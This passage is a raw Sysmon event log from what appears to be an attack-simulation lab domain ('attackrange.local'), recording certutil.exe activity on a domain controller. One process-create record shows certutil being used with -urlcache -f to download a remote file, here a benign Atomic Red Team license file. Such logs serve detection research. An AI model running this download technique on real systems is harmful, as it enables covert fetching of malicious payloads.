21:50:26.279{896A638B-B422-605B-8B69-00000000AE01}7404ATTACKRANGE\AdministratorC:\Windows\System32\certutil.exeC:\Windows\System32\2d2a313164ae3a724cc53b0c8e104dd6053f8402.keyMD5=DDA4F30CDD84D94A82586B61071F6AE3,SHA256=65AF6027045D23175366EAB50E460AB3EE7790E591CB84CC32C78AC63A4C90E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917969Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.237{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917968Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.190{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917967Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.190{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917966Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.179{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917965Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.179{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917964Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.158{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917963Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.157{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917962Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.157{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917961Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.156{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917960Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.155{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917959Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.150{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917958Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.149{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917957Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.149{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917956Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.149{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917955Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.148{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917954Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.148{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917953Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.148{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917952Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.148{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917951Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.140{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917950Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.140{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917949Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.136{896A638B-B422-605B-8C69-00000000AE01}1847952C:\Windows\system32\conhost.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917948Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.129{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B422-605B-8C69-00000000AE01}184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917947Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.126{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917946Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.124{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917945Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.124{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917944Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.124{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917943Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.123{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917942Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.123{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917941Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.123{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917940Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:26.123{896A638B-B422-605B-8B69-00000000AE01}7404C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" –urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt c:\temp\foo.txtC:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x8000000000000000638622Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:26.210{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBF1AC33AA479FF2AE5D3A09CEB288E0,SHA256=A6FB5E63F0039E89BE6261E74262C67DBB25B5FE05C15040F7CA891F292FCEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638621Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:26.210{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78B9E5001F7F6EC816E3E990C0E5FAE4,SHA256=71B4C5B6C66299683F9275CC191E4EEEA61EA8077CAFFA88E529757F55E8FF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638620Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:26.038{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04BAC4346126ED5C9BE817E93BA622A0,SHA256=FC91664EC087FA168AF00DAD311A8766E788A228F7EE2BA3C1720E5AAC557EFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917984Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 